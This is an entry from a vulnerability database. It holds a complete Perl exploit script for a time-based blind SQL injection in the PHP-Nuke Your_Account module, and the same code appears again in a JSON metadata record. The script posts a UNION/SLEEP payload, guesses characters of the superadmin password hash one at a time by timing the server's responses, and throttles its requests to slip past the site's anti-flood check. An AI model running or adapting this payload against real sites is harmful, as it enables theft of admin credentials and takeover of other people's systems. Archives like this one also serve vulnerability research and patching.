ID SSV:69359 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
# PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)
# Author: yawn
# Contact Me: http://www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90
# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes
use strict;
use warnings;
use LWP::UserAgent;
sub Nuke::Bench {
my $hosto = $_;
my $website = LWP::UserAgent->new;
my $average = 0;
print "[+] Calculating average load time (may take a while) ...\n";
for (my $i = 0; $i < 5 ; $i++) {
my $bef = time();
my $out = $website->get($hosto);
my $time = time();
$average += int($time-$bef);
}
return $average/5;
}
sub Nuke::Usage() {
print "[+] Usage: perl nuke.pl <host>\n";
print "[+] the host must be the complete path to modules.php\n";
print "[+] Example: perl nuke.pl http://www.site.com/modules.php\n";
}
sub Nuke::Banner() {
print "[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.1.0.3.5b\n";
print "[+] I'm not responsable for an illegal use of this exploit\n";
print "[+] Date: 06-02-2010\n";
print "[+] Author: yawn\n";
}
Nuke::Banner();
my $host = shift || die Nuke::Usage();
$host .= "?name=Your_Account&op=activate&username=WTF";
my $time = Nuke::Bench($host);
my $attack = LWP::UserAgent->new;
my $pass = "";
$attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9');
my @charset = (48..57, 97..102);
print "[+] Average load time is $time\n";
print "[+] Trying to exploit the SQL Injection\n";
for (my $j = 1; $j <=32; $j++) {
sleep(3); # PHP-Nuke has a special anti-flood system
foreach (@charset) {
sleep(2);
print "[+] Now trying with $_ \n";
my $before = time();
my $resp = $attack->post($host,
{ check_num => "'UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1" },
Referer => $host);
my $after = time();
if(int($after-$before) > ($time + 4)) {
print "[+] Success with ".chr($_)."\n";
$pass .= chr($_);
last;
}
}
}
print "[+] MD5 Hash : $pass\n";
{"href": "https://www.seebug.org/vuldb/ssvid-69359", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69359", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n # PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)\r\n# Author: yawn\r\n# Contact Me: http://www.unitx.net\r\n# Requirements: magic_quotes_gpc : off\r\n# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net | Dante90\r\n\r\n#\tYou will remember, Watson, how the dreadful business of the\r\n# Abernetty family was first brought to my notice by the depth which the\r\n# parsley had sunk into the butter upon a hot day.\r\n#\t\t -- Sherlock Holmes\r\n\r\nuse strict;\r\nuse warnings;\r\nuse LWP::UserAgent;\r\n\r\nsub Nuke::Bench {\r\n\tmy $hosto = $_;\r\n my $website = LWP::UserAgent->new;\r\n my $average = 0;\r\n print "[+] Calculating average load time (may take a while) ...\\n";\r\n for (my $i = 0; $i < 5 ; $i++) {\r\n my $bef = time();\r\n my $out = $website->get($hosto);\r\n my $time = time();\r\n $average += int($time-$bef);\r\n }\r\n return $average/5;\r\n}\r\n\r\nsub Nuke::Usage() {\r\n print "[+] Usage: perl nuke.pl <host>\\n";\r\n print "[+] the host must be the complete path to modules.php\\n";\r\n print "[+] Example: perl nuke.pl http://www.site.com/modules.php\\n"; \r\n}\r\n\r\nsub Nuke::Banner() {\r\n print "[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.1.0.3.5b\\n";\r\n print "[+] I'm not responsable for an illegal use of this exploit\\n";\r\n print "[+] Date: 06-02-2010\\n";\r\n print "[+] Author: yawn\\n";\r\n}\r\nNuke::Banner();\r\nmy $host = shift || die Nuke::Usage();\r\n$host .= "?name=Your_Account&op=activate&username=WTF";\r\nmy $time = Nuke::Bench($host);\r\nmy $attack = LWP::UserAgent->new;\r\nmy $pass = "";\r\n$attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9');\r\nmy @charset = (48..57, 97..102); \r\nprint "[+] Average load time is $time\\n";\r\nprint "[+] Trying to exploit the SQL Injection\\n";\r\n\r\nfor (my $j = 1; $j <=32; $j++) {\r\n\tsleep(3); # PHP-Nuke has a special anti-flood system\r\n\tforeach (@charset) {\r\n\t\tsleep(2);\r\n\t\tprint "[+] Now trying with $_ \\n";\r\n\t\tmy $before = time();\r\n\t\tmy $resp = $attack->post($host,\r\n\t\t{ check_num => "'UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1" }, \r\n\t\tReferer => $host);\r\n\t\tmy $after = time();\r\n\t\tif(int($after-$before) > ($time + 4)) {\r\n\t\t\tprint "[+] Success with ".chr($_)."\\n";\r\n\t\t\t$pass .= chr($_);\r\n\t\t\tlast;\r\n\t\t}\r\n\t}\r\n}\r\nprint "[+] MD5 Hash : $pass\\n";\r\n\r\n\r\n\n ", "id": "SSV:69359", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:09:49", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-11-19T17:09:49", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T17:09:49", "rev": 2}, "vulnersScore": -0.4}, "references": []}